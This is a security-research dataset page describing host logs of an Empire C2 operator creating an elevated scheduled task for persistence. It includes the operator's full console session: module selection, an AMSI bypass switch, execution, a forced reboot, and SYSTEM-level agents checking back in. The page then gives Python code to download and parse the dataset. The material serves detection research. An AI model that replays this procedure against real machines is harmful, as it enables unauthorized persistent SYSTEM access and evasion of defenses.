Empire Elevated Scheduled Tasks
Contents
Empire Elevated Scheduled Tasks#
Metadata#
Contributors |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2020/09/21 |
Modification Date |
2020/09/21 |
Tactics |
|
Techniques |
|
Tags |
Local Scheduled Tasks |
Dataset Description#
This dataset represents adversaries creating and/or executing local scheduled tasks to maintain persistence in an environment.
Datasets Downloads#
Type |
Link |
|---|---|
Host |
Adversary View#
Empire: agents) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
5LKFT4WY ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 7172 5/0.0 2020-09-21 21:28:46 http
M43EPU58 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5088 5/0.0 2020-09-21 21:43:06 http
4SUZ8X62 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 4092 5/0.0 2020-09-21 21:57:21 http
(Empire: agents) > interact 4SUZ8X62
(Empire: 4SUZ8X62) > usemodule persistence/elevated/schtasks*
(Empire: powershell/persistence/elevated/schtasks) > set AMSIBypass2 True
(Empire: powershell/persistence/elevated/schtasks) > set TaskName MordorElevated
(Empire: powershell/persistence/elevated/schtasks) > info
Name: Invoke-Schtasks
Module: powershell/persistence/elevated/schtasks
NeedsAdmin: True
OpsecSafe: False
Language: powershell
MinLanguageVersion: 2
Background: False
OutputExtension: None
Authors:
@mattifestation
@harmj0y
Description:
Persist a stager (or script) using schtasks running as
SYSTEM. This has a moderate detection/removal rating.
Comments:
https://github.com/mattifestation/PowerSploit/blob/master/Pe
rsistence/Persistence.psm1
Options:
Name Required Value Description
---- -------- ------- -----------
Agent True 4SUZ8X62 Agent to run module on.
Listener False http Listener to use.
Obfuscate False False Switch. Obfuscate the launcher
powershell code, uses the
ObfuscateCommand for obfuscation types.
For powershell only.
ObfuscateCommand False Token\All\1 The Invoke-Obfuscation command to use.
Only used if Obfuscate switch is True.
For powershell only.
AMSIBypass False True Include mattifestation's AMSI Bypass in
the stager code.
AMSIBypass2 False True Include Tal Liberman's AMSI Bypass in
the stager code.
DailyTime False Daily time to trigger the script
(HH:mm).
IdleTime False User idle time (in minutes) to trigger
script.
OnLogon False True Switch. Trigger script on user logon.
TaskName True MordorElevated Name to use for the schtask.
RegPath False HKLM:\Software\Microsoft Registry location to store the script
\Network\debug code. Last element is the key name.
ADSPath False Alternate-data-stream location to store
the script code.
ExtFile False Use an external file for the payload
instead of a stager.
Cleanup False Switch. Cleanup the trigger and any
script from specified location.
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
Proxy False default Proxy to use for request (default, none,
or other).
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
(Empire: powershell/persistence/elevated/schtasks) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked 4SUZ8X62 to run TASK_CMD_WAIT
[*] Agent 4SUZ8X62 tasked with task ID 1
[*] Tasked agent 4SUZ8X62 to run module powershell/persistence/elevated/schtasks
(Empire: powershell/persistence/elevated/schtasks) >
SUCCESS: The scheduled task "MordorElevated" has successfully been created.
Schtasks persistence established using listener http stored in HKLM:\Software\Microsoft\Network\debug with MordorElevated OnLogon trigger.
(Empire: powershell/persistence/elevated/schtasks) > back
(Empire: 4SUZ8X62) > shell shutdown /r
[*] Tasked 4SUZ8X62 to run TASK_SHELL
[*] Agent 4SUZ8X62 tasked with task ID 2
(Empire: 4SUZ8X62) >
..Command execution completed.
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5
[*] New agent Y2ADR48N checked in
[*] New agent D43KCT91 checked in
[+] Initial agent Y2ADR48N from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to Y2ADR48N at 172.18.39.5
[+] Initial agent D43KCT91 from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to D43KCT91 at 172.18.39.5
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
5LKFT4WY ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 7172 5/0.0 2020-09-21 21:28:46 http
M43EPU58 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5088 5/0.0 2020-09-21 21:43:06 http
4SUZ8X62 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 4092 5/0.0 2020-09-21 21:59:29 http
Y2ADR48N ps 172.18.39.5 WORKSTATION5 *THESHIRE\SYSTEM powershell 620 5/0.0 2020-09-21 22:01:50 http
D43KCT91 ps 172.18.39.5 WORKSTATION5 *THESHIRE\SYSTEM powershell 636 5/0.0 2020-09-21 22:01:51 http
(Empire: agents) >
Explore Datasets#
Download & Decompress Dataset#
import requests
from zipfile import ZipFile
from io import BytesIO
url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/empire_schtasks_creation_execution_elevated_user.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
Read JSON File#
from pandas.io import json
df = json.read_json(path_or_buf=datasetJSONPath, lines=True)
Access Security Events#
df.groupby(['Channel']).size().sort_values(ascending=False)